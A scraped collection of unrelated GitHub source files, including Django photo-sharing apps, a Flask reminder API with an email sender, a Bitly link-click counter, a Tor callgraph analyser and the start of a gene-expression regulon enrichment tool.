_drop_image(orig_path, new_path, 'background')
expected_svg = expected_path.read_text()
output_svg = new_path.read_text()
assert expected_svg == output_svg
```
|
{
"source": "JessyDL/psl",
"score": 2
}
|
#### File: psl/tools/generate_project_info.py
```python
import versioning
import os
from datetime import datetime
def generate(filepath, force = False):
major, minor, patch = versioning.git_version()
sha1 = versioning.git_sha1()
unix_timestamp = versioning.git_timestamp()
utc_timestamp = datetime.utcfromtimestamp(unix_timestamp).strftime('%Y-%m-%d %H:%M:%S')
authors = versioning.all_authors()
if os.path.exists(filepath) and not force:
fObj = open(filepath, 'r')
content = fObj.read()
if f"// generated from commit sha1 {sha1}." in content:
print("header file up to date")
return
print("header file out of date, updating...")
fObj.close()
fObj = open(filepath, 'w+')
fObj.write("// *****************************************************************************\n")
fObj.write("// generated header file don't edit.\n")
fObj.write("// edit `tools/versioning.py` instead.\n")
fObj.write(f"// generated from commit sha1 {sha1}.\n")
fObj.write("// *****************************************************************************\n")
fObj.write("#include <psl/types.hpp>\n")
fObj.write("#include <string_view>\n")
fObj.write("#include <array>\n")
fObj.write(
'''
/**
* @brief root library namespace
* @details the entire Paradigm Standard Library lives in this namespace.
* Rarely some free functions might be declared, but they will likely be limited in scope to a certain constraint (like
* `enum.hpp')
*
*/
''')
fObj.write('namespace psl\n')
fObj.write('{\n')
fObj.write(f'\tconstexpr std::string_view VERSION_TIME_UTC {{ "{utc_timestamp}" }};\n')
fObj.write(f'\tconstexpr std::string_view VERSION_SHA1 {{ "{sha1}" }};\n')
fObj.write(f'\tconstexpr std::string_view VERSION_FULL {{ "{major}.{minor}.{patch}.{sha1}" }};\n')
fObj.write(f'\tconstexpr ui64 VERSION_TIME_UNIX {{ {unix_timestamp} }};\n')
fObj.write(f'\tconstexpr ui32 VERSION_MAJOR {{ {major} }};\n')
fObj.write(f'\tconstexpr ui32 VERSION_MINOR {{ {minor} }};\n')
fObj.write(f'\tconstexpr ui32 VERSION_PATCH {{ {patch} }};\n')
fObj.write( '\tconstexpr ui32 VERSION {((VERSION_MAJOR << 22) | (VERSION_MINOR << 12) | VERSION_PATCH)};\n')
fObj.write( '\n')
fObj.write("\tconstexpr static std::array<std::string_view, "+str(len(authors))+ "> PROJECT_CREDITS\n\t{{\n")
for i, author in enumerate(authors):
if i < len(authors) - 1:
fObj.write('\t\t"' + author + '",\n')
else:
fObj.write('\t\t"' + author + '"')
fObj.write("\n\t}};\n")
fObj.write('}\n')
#fObj.write("constexpr static psl::string8::view APPLICATION_FULL_NAME {\"PSL "+ version + "." +sha1+ " "+ utc_timestamp +"\"};\n")
fObj.truncate()
fObj.close()
if __name__ == "__main__":
generate(os.path.dirname(os.path.realpath(__file__)) +"/../include/psl/psl.hpp", True)
```
|
{
"source": "je-ss-y/Gallero",
"score": 3
}
|
#### File: Gallero/pictures/models.py
```python
from django.db import models
# Create your models here.
class Category(models.Model):
category_name = models.CharField(max_length =30)
def __str__(self):
return self.category_name
def save_category(self):
self.save()
class Meta:
ordering = ['category_name']
class Location(models.Model):
location_name = models.CharField(max_length =30)
def __str__(self):
return self.location_name
def save_location(self):
self.save()
class Image(models.Model):
image_name = models.CharField(max_length =30)
image_description = models.TextField()
category = models.ForeignKey(Category, db_column='category_name')
location = models.ManyToManyField(Location)
image = models.ImageField(upload_to = 'imagepath/')
@classmethod
def search_by_category(cls,search_term):
pictures = cls.objects.filter(category__category_name__contains=search_term)
return pictures
```
|
{
"source": "je-ss-y/Insta-memories",
"score": 2
}
|
#### File: Insta-memories/posts/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from tinymce.models import HTMLField
# Create your models here.
class Image(models.Model):
image= models.ImageField(upload_to='images/', blank=True)
photoname = models.TextField()
caption = HTMLField()
# upvote = models.ManyToManyField(User)
user = models.ForeignKey(User,on_delete=models.CASCADE)
pub_date = models.DateTimeField(auto_now_add=True)
# profile = models.ForeignKey(Profile,on_delete=models.CASCADE)
# tags = models.ManyToManyField(tags)
def __str__(self):
return self.image
def save_image(self):
self.user
def delete_image(self):
self.delete()
@classmethod
def search_by_name(cls,search_term):
searched_user = cls.objects.filter(user__username__contains=search_term)
return searched_user
@classmethod
def get_image(cls):
image= cls.objects.all().prefetch_related('comment_set')
return image
class Profile(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE,related_name='profile')
bio = models.TextField()
profilepicture= models.ImageField(upload_to='profile/', blank=True)
def __str__(self):
return self.profilepicture
def save_profile(self):
self.user
def delete_profile(self):
self.delete()
class Comment(models.Model):
comment = models.TextField()
image = models.ForeignKey(Image, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.comment
```
#### File: Insta-memories/posts/tests.py
```python
from django.test import TestCase
from .models import Image,Profile,Comment
from django.contrib.auth.models import User
# Create your tests here.
class ImageTestClass(TestCase):
# set up method
def setUp(self):
self.user=User.objects.create(username='jessy')
# self.profile=Profile.objects.create(id=1,user=jessica,bio=creating,profile_photo="")
self.image=Image(image='https://www.italymagazine.com/sites/default/files/styles/624xauto/public/feature-story/leader/bolzano-lead.jpg?itok=SsNNvkdk',photoname='person',caption='hello', pub_date='2019-9-2')
#testing instance
def test_instance(self):
self.assertTrue(isinstance(self.image.Image))
# self.assertTrue(isinstance(self.profile.Profile))
self.assertTrue(isinstance(self.user.User))
def save_instance(self):
self.image.save_image()
images=Image.objects.all()
self .assertTrue(len(images)>0)
class ProfileClass(TestCase):
# set up method
def setUp(self):
self.profile=Profile.objects.create(id=1,user=jessica,bio=creating,profile_photo="https://www.italymagazine.com/sites/default/files/styles/624xauto/public/feature-story/leader/bolzano-lead.jpg?itok=SsNNvkdk")
#testing instance
def test_instance(self):
self.assertTrue(isinstance(self.profile.Profile))
def save_instance(self):
self.image.save_image()
images=Image.objects.all()
self .assertTrue(len(images)>0)
```
#### File: Insta-memories/posts/views.py
```python
from django.shortcuts import render,redirect
from django.http import HttpResponse,Http404
import datetime as dt
from .models import Image,Profile,Comment
from django.contrib.auth.decorators import login_required
from .forms import NewImageForm,ProfileForm,CommentForm
from django.contrib.auth.forms import UserCreationForm
from registration.backends.simple.views import RegistrationView
from django.contrib.auth.models import User
@login_required(login_url='/accounts/login/')
def new_post(request):
current_user = request.user
if request.method == 'POST':
form = NewImageForm(request.POST, request.FILES)
if form.is_valid():
article = form.save(commit=False)
article.user = current_user
article.save()
return redirect('postsToday')
else:
form =NewImageForm()
return render(request, 'all-posts/onepost.html', {"form": form})
# Create your views here.
@login_required(login_url='/accounts/login/')
def posts_of_day(request):
current_user = request.user
date = dt.date.today()
images = Image.get_image()
comment = Comment.objects.all()
for image in images:
comments = Comment.objects.filter(image=image)
print(comments)
# comment = Comment.objects.filter(id = current_user.id).first()
# print(comment)
return render(request, 'all-posts/posts-today.html', {"date": date,"images": images, 'comments':comments})
# View Function to present posts from past days
def past_days_posts(request, past_date):
try:
# Converts data from the string Url
date = dt.datetime.strptime(past_date, '%Y-%m-%d').date()
except ValueError:
# Raise 404 error when ValueError is thrown
raise Http404()
assert False
if date == dt.date.today():
return redirect(postsToday)
return render(request, 'all-posts/past-posts.html', {"date": date})
@login_required(login_url='/accounts/login/')
def profile_form(request):
current_user = request.user
if request.method == 'POST':
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.user = current_user
profile.save()
return redirect('profile')
else:
form = ProfileForm()
return render(request, 'all-posts/profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def user_profile(request):
current_user = request.user
images = Image.objects.filter(user=current_user)
profilepicture=Profile.objects.get(user=current_user)
return render(request, 'all-posts/profiledisplay.html', {"profilepicture": profilepicture,"images":images})
def search_results(request):
if 'username' in request.GET and request.GET["username"]:
search_term = request.GET.get("username")
searched_users= Image.search_by_name(search_term)
message = f"{search_term}"
return render(request, 'all-posts/search.html',{"searched_users": searched_users})
else:
message = "You haven't searched for any term"
return render(request, 'all-posts/search.html',{"message":message})
# def register(request):
# if request.method == 'POST':
# form = UserCreationForm(request.POST)
# if form.is_valid():
# form.save()
# return redirect('profiledisplay')
# else:
# form = UserCreationForm()
# args={"form":form}
# return render(request, 'registration/registration_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def commenting(request,image_id):
current_user = request.user
if request.method == 'POST':
imagetocomment = Image.objects.filter(id = image_id).first()
# user = User.objects.filter(user = current_user.id).first()
# print(user)
form = CommentForm(request.POST, request.FILES)
if form.is_valid():
comment = form.save(commit=False)
comment.user= current_user
comment.image =imagetocomment
comment.save()
return redirect('postsToday')
else:
form = CommentForm()
return render(request, 'all-posts/comment-form.html', {"form": form, 'image_id':image_id})
```
|
{
"source": "JessyLeal/flyfood",
"score": 3
}
|
#### File: flyfood/genetic-algorithm-flyfood/in_data.py
```python
file = open('teste.txt', 'r')
def in_data():
"""Na funçao `in_data` é tratado os dados da matriz lida do arquivo txt."""
points = {}
i, j = map(int, file.readline().split(' '))
for l in range(i):
line = file.readline().split(' ')
if len(line)==j:
for colun in range(len(line)):
if line[colun].find("\n")!= -1:
line[colun] = line[colun][-2]
if line[colun] not in '0' :
points[line[colun]] = (l, colun)
else:
raise ValueError('Incosistence number of coluns in line. ')
return points
```
|
{
"source": "JessYu-1011/Flask-Vue-Reminder",
"score": 3
}
|
#### File: app/apis/subjects_api.py
```python
from app import db
from flask_restx import Resource, fields, Namespace
from app.models import Subjects, SubjectNames
from app.schema import *
from datetime import datetime
from sqlalchemy.exc import IntegrityError
api = Namespace('subjects', 'Subjects Related Method')
# The format to output data
subject_output_data = api.model('output', {
'id': fields.Integer,
'subject_name': fields.String('name'),
'hw_detail': fields.String('description'),
'reminding_time': fields.String('reminding_time'),
'reminding_date': fields.String('reminding_date'),
'modify_time': fields.DateTime(dt_format='iso8601'),
'pages': fields.String('pages')
})
# The format to input data
subject_input_data = api.model('input', {
'name': fields.String('name'),
'detail': fields.String('description'),
'pages': fields.String('pages'),
'reminding_time': fields.String('time'),
'reminding_date': fields.String('reminding_date'),
})
# For frontedn to create a list
@api.route('/info')
class SubjectsInfo(Resource):
@api.marshal_with(subject_output_data)
def get(self):
subjects = Subjects.query.filter_by(done=False).order_by(Subjects.id).all()
subject_output = subjects_schema.dump(subjects)
return subject_output
# To modify each id detail
@api.route('/modify/<int:subject_id>')
class SubjectModify(Resource):
@api.marshal_with(subject_output_data)
def get(self, subject_id):
subject = Subjects.query.filter_by(id=subject_id, done=False).first()
subject_output = subject_schema.dump(subject)
return subject_output
@api.expect(subject_input_data)
@api.marshal_with(subject_output_data)
def put(self, subject_id):
subject = Subjects.query.filter_by(id=subject_id).first()
body = api.payload
data = body['data']
subject.subject_name = data['name']
subject.hw_detail = data['detail']
subject.reminding_time = data['reminding_time']
subject.reminding_date = data['reminding_date']
subject.pages = data['pages']
db.session.add(subject)
db.session.commit()
def delete(self, subject_id):
subject = Subjects.query.filter_by(id=subject_id).first()
db.session.delete(subject)
db.session.commit()
# To create a new data
@api.route('/create')
class SubjectCreate(Resource):
@api.expect(subject_input_data)
@api.marshal_with(subject_output_data)
def post(self):
# frontend will send the body to backend
'''
It will be like
headers: {'Content-Type': 'application/json'},
data: {'name': 'xxx', 'pages': 'xxx', 'detail': 'xxxx', 'reminding_time': 'xxx'}
'''
body = api.payload
data = body['data']
# Time must be a String
# It just have " %Y-%m-%d %H:%M"
subject = Subjects(subject_name=data['name'],
hw_detail=data['detail'],
reminding_time=data['reminding_time'],
reminding_date=data['reminding_date'],
pages=data['pages'])
db.session.add(subject)
db.session.commit()
subject_names_output_data = api.model('subject_names_output', {
"id": fields.String('subject_names_id'),
"subject_name": fields.String('subject_names_name')
})
subject_names_input_data = api.model('subject_names_input', {
"subject_name": fields.String('subject_names_name')
})
@api.route('/subject_names_list')
class SubjectNamesListInfo(Resource):
def get(self):
data = SubjectNames.query.order_by(SubjectNames.id).all()
subject_name_output = subject_names_schema.dump(data)
return subject_name_output
@api.expect(subject_names_input_data)
@api.marshal_with(subject_names_output_data)
def post(self):
body = api.payload
data = body['data']
subject_name = SubjectNames(subject_name=data['subject_name'])
# The subject_name column is unique, so if it has been set already
# It will casuse the exception
try:
db.session.add(subject_name)
db.session.commit()
except IntegrityError:
return "The value has been set"
@api.expect(subject_names_input_data)
def delete(self):
data = api.payload
subject_name = SubjectNames.query.filter_by(subject_name=data['subject_name']).first()
db.session.delete(subject_name)
db.session.commit()
@api.route('/subject_names_list/<int:id>')
class SubjectNamesListModification(Resource):
@api.expect(subject_names_input_data)
@api.marshal_with(subject_names_output_data)
def put(self, id):
subject_name = SubjectNames.query.filter_by(id=id).first()
body = api.payload
data = body['data']
subject_name.subject_name = data['subject_name']
db.session.add(subject_name)
db.session.commit()
```
#### File: migrations/versions/4085680c4ce9_.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4085680c4ce9'
down_revision = '4<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=40), nullable=False),
sa.Column('email', sa.String(length=50), nullable=False),
sa.Column('password', sa.String(length=128), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
sa.UniqueConstraint('username')
)
op.add_column('subjects', sa.Column('user', sa.Integer(), nullable=False))
op.create_foreign_key(None, 'subjects', 'users', ['user'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'subjects', type_='foreignkey')
op.drop_column('subjects', 'user')
op.drop_table('users')
# ### end Alembic commands ###
```
#### File: Flask-Vue-Reminder/tasks/mail.py
```python
import smtplib
# Non ASCII
from email.mime.text import MIMEText
from config import Config
MAIL_ACCOUNT = Config.MAIL_ACCOUNT
TO_ADDR = Config.TO_ADDR
MAIL_PASSWORD = Config.MAIL_PASSWORD
# Send email function
def send_email(subject_name, pages, detail, reminding_time):
# Email content
mime=MIMEText(f"{subject_name} ready to start!!\nPages: {pages}\nDetail: {detail}",
"plain",
"utf-8"
)
# Email subject
mime["Subject"] = f"{subject_name} Reminding"
# Email from address
mime["From"] = MAIL_ACCOUNT
# Email to address
mime["TO"] = TO_ADDR
# Transfer to string
msg = mime.as_string()
smtp = smtplib.SMTP('smtp.gmail.com', 587)
# Register SMTP server
smtp.ehlo()
# Use TLS
smtp.starttls()
smtp.login(MAIL_ACCOUNT, MAIL_PASSWORD)
from_addr = MAIL_ACCOUNT
to_addr = TO_ADDR
status = smtp.sendmail(from_addr, to_addr, msg)
if status == {}:
print("SUCCESS")
else:
print("FAILED")
smtp.quit()
```
|
{
"source": "jesszwang/throttle-tor",
"score": 3
}
|
#### File: scripts/maint/analyze_callgraph.py
```python
import re
import sys
import copy
import cPickle
import os
class Parser:
def __init__(self):
self.calls = {}
def enter_func(self, name):
if self.infunc and not self.extern:
self.calls.setdefault(self.infunc, set()).update( self.calledfns )
self.calledfns = set()
self.infunc = name
self.extern = False
def parse_callgraph_file(self, inp):
self.infunc = None
self.extern = False
self.calledfns = set()
for line in inp:
m = re.match(r"Call graph node for function: '([^']+)'", line)
if m:
self.enter_func(m.group(1))
continue
m = re.match(r" CS<[^>]+> calls external node", line)
if m:
self.extern = True
m = re.match(r" CS<[^>]+> calls function '([^']+)'", line)
if m:
self.calledfns.add(m.group(1))
self.enter_func(None)
def extract_callgraph(self):
c = self.calls
self.calls = {}
return c
def transitive_closure(g):
passno = 0
changed = True
g = copy.deepcopy(g)
import random
while changed:
passno += 1
changed = False
keys = g.keys()
idx = 0
for k in keys:
idx += 1
print "Pass %d/?: %d/%d\r" %(passno, idx, len(keys)),
sys.stdout.flush()
newset = g[k].copy()
for fn in g[k]:
newset.update(g.get(fn, set()))
if len(newset) != len(g[k]):
g[k].update( newset )
changed = True
print
return g
def strongly_connected_components(g):
# From https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm, done stupidly.
index_of = {}
index = [ 0 ]
lowlink = {}
S = []
onStack = set()
all_sccs = []
def strongconnect(fn):
index_of[fn] = index[0]
lowlink[fn] = index[0]
index[0] += 1
S.append(fn)
onStack.add(fn)
for w in g.get(fn, []):
if w not in index_of:
strongconnect(w)
lowlink[fn] = min(lowlink[fn], lowlink[w])
elif w in onStack:
lowlink[fn] = min(lowlink[fn], index_of[w])
if lowlink[fn] == index_of[fn]:
this_scc = []
all_sccs.append(this_scc)
while True:
w = S.pop()
onStack.remove(w)
this_scc.append(w)
if w == fn:
break
for v in g.keys():
if v not in index_of:
strongconnect(v)
return all_sccs
def biggest_component(sccs):
return max(len(c) for c in sccs)
def connection_bottlenecks(callgraph):
callers = {}
for fn in callgraph:
for fn2 in callgraph[fn]:
callers.setdefault(fn2, set()).add(fn)
components = strongly_connected_components(callgraph)
components.sort(key=len)
big_component_fns = components[-1]
size = len(big_component_fns)
function_bottlenecks = fn_results = []
total = len(big_component_fns)
idx = 0
for fn in big_component_fns:
idx += 1
print "Pass 1/3: %d/%d\r"%(idx, total),
sys.stdout.flush()
cg2 = copy.deepcopy(callgraph)
del cg2[fn]
fn_results.append( (size - biggest_component(strongly_connected_components(cg2)), fn) )
print
bcf_set = set(big_component_fns)
call_bottlenecks = fn_results = []
result_set = set()
total = len(big_component_fns)
idx = 0
for fn in big_component_fns:
fn_callers = callers[fn].intersection(bcf_set)
idx += 1
if len(fn_callers) != 1:
continue
print "Pass 2/3: %d/%d\r"%(idx, total),
sys.stdout.flush()
caller = fn_callers.pop()
assert len(fn_callers) == 0
cg2 = copy.deepcopy(callgraph)
cg2[caller].remove(fn)
fn_results.append( (size - biggest_component(strongly_connected_components(cg2)), fn, "called by", caller) )
result_set.add( (caller, fn) )
print
total = len(big_component_fns)
idx = 0
for fn in big_component_fns:
fn_calls = callgraph[fn].intersection(bcf_set)
idx += 1
if len(fn_calls) != 1:
continue
print "Pass 3/3: %d/%d\r"%(idx, total),
sys.stdout.flush()
callee = fn_calls.pop()
if (fn, callee) in result_set:
continue
assert len(fn_calls) == 0
cg2 = copy.deepcopy(callgraph)
cg2[fn].remove(callee)
fn_results.append( (size - biggest_component(strongly_connected_components(cg2)), callee, "called by", fn) )
print
return (function_bottlenecks, call_bottlenecks)
if __name__ == '__main__':
p = Parser()
for fname in sys.argv[1:]:
with open(fname, 'r') as f:
p.parse_callgraph_file(f)
sys.stdout.flush
print "Building callgraph"
callgraph = p.extract_callgraph()
print "Finding strongly connected components"
sccs = strongly_connected_components(callgraph)
print "Finding the transitive closure of the callgraph.."
closure = transitive_closure(callgraph)
print "Finding bottlenecks..."
bottlenecks = connection_bottlenecks(callgraph)
data = {
'callgraph' : callgraph,
'sccs' : sccs,
'closure' : closure,
'bottlenecks' : bottlenecks }
with open('callgraph.pkl', 'w') as f:
cPickle.dump(data, f)
```
|
{
"source": "jest995/count-click",
"score": 3
}
|
#### File: jest995/count-click/main.py
```python
import argparse
import os
from urllib.parse import urlsplit
import requests
from dotenv import load_dotenv
def shorten_link(link, headers):
payload = {"long_url": link}
url = "https://api-ssl.bitly.com/v4/bitlinks"
response = requests.post(url, headers=headers, json=payload)
response.raise_for_status()
bitlink = response.json()["link"]
return bitlink
def count_click(bitlink, headers):
payload = {"unit": "day", "units": -1}
url = f"https://api-ssl.bitly.com/v4/bitlinks/{bitlink}/clicks/summary"
response = requests.get(url, headers=headers, params=payload)
response.raise_for_status()
total_clicks = response.json()["total_clicks"]
return total_clicks
def is_bitlink(link, headers):
url = f"https://api-ssl.bitly.com/v4/bitlinks/{link}"
response = requests.get(url, headers=headers)
return response.ok
if __name__ == "__main__":
load_dotenv()
TOKEN = os.environ['BITLY_TOKEN']
HEADERS = {
"Authorization": f"Bearer {TOKEN}"
}
parser = argparse.ArgumentParser()
parser.add_argument('link', nargs='?')
namespace = parser.parse_args()
if namespace.link:
user_input = namespace.link
else:
user_input = input("Введите ссылку:\n")
parse_link = urlsplit(user_input)
user_link = parse_link.netloc + parse_link.path
if is_bitlink(user_link, HEADERS):
try:
clicks_count = count_click(user_link, HEADERS)
except requests.exceptions.HTTPError:
print("Неправильный битлинк")
else:
print(f"По вашей ссылке прошли: {clicks_count} раз(а)")
else:
try:
bitlink = shorten_link(user_input, HEADERS)
except requests.exceptions.HTTPError:
print("Неправильная ссылка")
else:
print('Битлинк', bitlink)
```
|
{
"source": "JEstabrook/regulon-enrichment",
"score": 2
}
|
#### File: regulon-enrichment/enricher/enrich.py
```python
import warnings
import os
import functools
import pandas as pd
import numpy as np
from tqdm import tqdm
from sklearn.utils.validation import check_array
import enricher.regulon.regulon_enrichment as regulon_enrichment
import enricher.features.expression_utils as expression_utils
import enricher.regulon.regulon_utils as regulon_utils
import argparse
warnings.simplefilter("ignore", UserWarning)
test = 'test'
if __name__ == '__main__':
DATA_PATH = os.path.join(os.getcwd(), 'data')
else:
dirname = os.path.dirname(__file__)
DATA_PATH = os.path.join(dirname, 'data')
sif_file = DATA_PATH + '/PathwayCommons9.All.hgnc.sif.gz'
sec_intx_file = DATA_PATH + '/secondary_intx_regulon.pkl'
class Error(Exception):
"""Base class for other exceptions"""
class OmicError(Error):
"""Raised when duplications in omic features or samples are detected"""
class Enrichment(object):
"""Base enrichment class for predicting regulon enrichment from -omic datasets.
Args:
cohort :
expr (:obj:`pd.DataFrame`, shape = [n_feats, n_samps])
regulon (:obj: `pandas DataFrame`)
regulon_size (int): Minimum number of edges for a given regulator.
sec_intx_file (str): Path to pre-compiled secondary interaction network.
"""
def __init__(self, cohort, expr, regulon=None, regulon_size=15, sec_intx=sec_intx_file,
thresh_filter=0.1):
if not isinstance(expr, pd.DataFrame):
raise TypeError("`expr` must be a pandas DataFrame, found "
"{} instead!".format(type(expr)))
if len(set(expr.index)) != expr.shape[0]:
print(len(set(expr.index)))
print(expr.shape)
raise OmicError("Duplicate feature names in {cohort} dataset!".format(cohort=cohort))
if len(set(expr.columns)) != expr.shape[1]:
raise OmicError("Duplicate sample names in {cohort} dataset!".format(cohort=cohort))
self.cohort = cohort
self.expr = expr
if regulon is None:
self.regulon = regulon_utils.read_pickle(sec_intx)
else:
self.regulon = regulon
self.scaler_type = None
self.scaled = False
self.regulon_size = regulon_size
self.regulon_weights = None
self.thresh_filter = thresh_filter
self.total_enrichment = None
self.delta = None
self.local_enrichment = None
self.regulators = None
self.quant_nes = None
def __str__(self):
return """------\nCohort: {}\nn-features: {}\nn-samples: {}\nscaler: {}\nscaled:\
{}\nregulon threshold: {}\nregulon nodes: {}\nregulon edges: {}\n------\n""".\
format(self.cohort,
self.expr.shape[0],
self.expr.shape[1],
self.scaler_type,
self.scaled, self.regulon_size,
len(self.regulon.UpGene.unique()),
self.regulon.shape[0])
def __repr__(self):
return """------\nCohort: {}\nn-features: {}\nn-samples: {}\nscaler: {}\nscaled: {}\
\nregulon threshold: {}\nregulon nodes: {}\nregulon edges: {}\n------\n""".\
format(self.cohort,
self.expr.shape[0],
self.expr.shape[1],
self.scaler_type,
self.scaled,
self.regulon_size,
len(self.regulon.UpGene.unique()),
self.regulon.shape[0])
@staticmethod
def _preprocess_data(expr, scaler_type='robust', thresh_filter=0.1):
""" Centers expression data based on a specified data scaler algorithm
Args:
expr (pandas DataFrame obj): pandas DataFrame of [n_features, n_samples]
scaler_type (str): Scaler to normalized features/samples by:
standard | robust | minmax | quant
thresh_filter (float): Prior to normalization remove features that have
a standard deviation per feature less than {thresh_filter}
Returns:
scaled_frame (:obj: `pandas DataFrame`) : pandas DataFrame containing
scaled expression data of shape [n_samples, n_features]
"""
# By default, the input is checked to be a non-empty 2D array containing
# only finite values.
_ = check_array(expr)
scaler_opt = {'standard': expression_utils.StandardScaler(),
'robust': expression_utils.RobustScaler(),
'minmax': expression_utils.MinMaxScaler(),
'quant': expression_utils.QuantileTransformer()}
if scaler_type not in scaler_opt:
raise KeyError('{scaler_type} not supported scaler_type!'
' Supported types include: {keys}'.format(
scaler_type=scaler_type, keys=' | '.join(scaler_opt.keys())))
scaler = scaler_opt[scaler_type]
# Transpose frame to correctly orient frame for scaling and machine learning algorithms
print('--- log2 normalization ---')
expr_t = expr[(expr.std(axis=1) > thresh_filter)].T
expr_lt = expression_utils.log_norm(expr_t)
print('--- Centering features with {} scaler ---'.format(scaler_type))
scaled_frame = pd.DataFrame(scaler.fit_transform(expr_lt),
index=expr_lt.index,
columns=expr_lt.columns)
return scaled_frame
@staticmethod
def _prune_regulon(expr, regulon, regulon_size):
""" Prunes regulon with secondary interactions that do not meet
the necessary number of downstream interactions metric {regulon_size}
Args:
expr (pandas DataFrame obj): pandas DataFrame of [n_samples, n_features]
regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight
interactions between regulator and downstream members of its regulon
of shape [len(Target), ['Regulator','Target','MoA','likelihood']
regulon_size (int) : number of downstream interactions required for a
given regulator in order to calculate enrichment score
Returns:
filtered_regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight
interactions between regulator and downstream members of its regulon of shape :
[len(Target), ['Regulator','Target','MoA','likelihood']
"""
expr_filtered_regulon = regulon[
((regulon.UpGene.isin(expr.columns)) & (regulon.DownGene.isin(expr.columns)))].\
set_index('UpGene')
idx = (expr_filtered_regulon.index.value_counts() >= regulon_size)
filtered_regulon = expr_filtered_regulon.loc[idx[idx == True].index].reset_index()
edges = list(set(filtered_regulon.UpGene) | set(filtered_regulon.DownGene))
sub_expr = expr.loc[:,edges]
return filtered_regulon, sub_expr
@staticmethod
def _structure_weights(regulator, pruned_regulon, f_statistics, r_frame, p_frame):
""" Calculates weights associated with regulators. Weights are the summation of
the F-statistic and absolute spearman correlation coefficient. The weight
retains the sign of the spearman correlation coefficient.
Args:
regulator (str): A feature to assign weights to downstream interactions
pruned_regulon (:obj:`pd.DataFrame`, shape = [n_interactions, 3]
f_statistics (dict) : Dictionary with key:{regulator} key and
r_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
p_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
Returns:
weights_ordered (:obj:`pd.DataFrame`), shape = [n_interactions, 3]
"""
sub_regul = pruned_regulon[(pruned_regulon['UpGene'] == regulator)]
targs = sub_regul.DownGene
p_ = p_frame.loc[targs, regulator]
p_.name = 'likelihood'
f_ = f_statistics[regulator][0]
r_ = r_frame.loc[targs, regulator]
w_ = (f_ + abs(r_)) * np.sign(r_)
w_.index.name = 'Target'
w_.name = 'MoA'
weights = w_.to_frame()
weights['likelihood'] = p_
weights['Regulator'] = regulator
weights_ordered = weights.reset_index().\
reindex(['Regulator', 'Target', 'MoA', 'likelihood'], axis=1)\
.set_index('Regulator')
return weights_ordered
def scale(self, scaler_type='robust', thresh_filter=0.1):
""" Fit and scale expression data based on a specified data scaler algorithm
Args:
scaler_type (str): Scaler to normalized features/samples by:
standard | robust | minmax | quant
thresh_filter (float): Prior to normalization remove features that do not have
the mean unit of a feature (i.e. 1 tpm) is greater than {thresh_filter}
"""
self.scaler_type = scaler_type
if scaler_type == None:
warnings.warn('Proceeding without scaling dataset!')
self.expr = self.expr.T
else:
self.expr = self._preprocess_data(self.expr, self.scaler_type, thresh_filter)
self.scaled = True
def assign_weights(self):
"""
Generate normalized likelihood weights and assigns those weights to the absolute gene
expression signature
"""
if not self.scaled:
warnings.warn('Assigning interaction weights without scaling dataset!')
pruned_regulon, sub_expr = self._prune_regulon(self.expr, self.regulon, self.regulon_size)
self.expr = sub_expr
# noinspection PyTypeChecker
r, p = regulon_utils.spearmanr(self.expr)
r_frame = pd.DataFrame(r, columns=self.expr.columns, index=self.expr.columns)
p_frame = pd.DataFrame(p, columns=self.expr.columns, index=self.expr.columns)
F_statistics = {regulator: regulon_utils.f_regression(
self.expr.reindex(frame.DownGene, axis=1),
self.expr.reindex([regulator], axis=1).values.ravel())
for regulator, frame in pruned_regulon.groupby('UpGene')}
weights = pd.concat([self._structure_weights(regulator,
pruned_regulon,
F_statistics,
r_frame,
p_frame)
for regulator in F_statistics])
self.regulon_weights = weights[~np.isinf(weights.MoA)]
def calculate_enrichment(self):
"""
Subset and generate regulator activity scores based on rank ordering of up-regulated
and down-regulated targets
"""
if self.regulon_weights is None:
raise TypeError("`regulon_weights` must be assigned prior to enrichment calculation,"
" found {} instead!".format(type(self.regulon_weights)))
quant_nes = regulon_enrichment.quantile_nes_score(self.regulon_weights, self.expr.T)
self.quant_nes = quant_nes
self.regulators = self.regulon_weights.index.unique()
print('--- Calculating regulon enrichment scores ---')
nes_list, local_enrich_list, delta_list = zip(*list(map(functools.partial(regulon_enrichment.score_enrichment,
expr=self.expr,
regulon=self.regulon_weights,
quant_nes=quant_nes),
tqdm(self.regulators))))
self.total_enrichment = pd.concat(nes_list, axis=1)
self.local_enrichment = pd.concat(local_enrich_list, axis=1)
self.delta = pd.concat(delta_list, axis=1)
def main():
parser = argparse.ArgumentParser(
"Infer transcription factor activity from gene expression data utilizing pathway and molecular interactions "
"and mechanisms available through Pathway Commons."
)
parser.add_argument('cohort', type=str, help="which TCGA cohort to use")
parser.add_argument('expr', type=str, help="which tab delimited expression matrix to use "
"shape : [n_features, n_samples]"
"units : TPM, RPKM")
parser.add_argument('out_dir', type=str, help="output directory")
parser.add_argument('--regulon', type=str, help="optional regulon containing weight interactions between "
"regulator and downstream members of its regulon"
"shape : [len(Target), ['Regulator','Target','MoA','likelihood']",
default=None)
parser.add_argument('--regulon_size', type=int, help="number of downstream interactions required for a given "
"regulator in order to calculate enrichment score", default=15)
parser.add_argument('--sec_intx', type=str, help="path to pre-compiled serialized secondary "
"interaction network", default=sec_intx_file)
parser.add_argument('--scaler_type', type=str, help="Scaler to normalized features/samples by: "
"standard | robust | minmax | quant", default='robust')
parser.add_argument('--thresh_filter', type=float, help="Prior to normalization remove features that have a standard "
"deviation per feature less than {thresh_filter}",
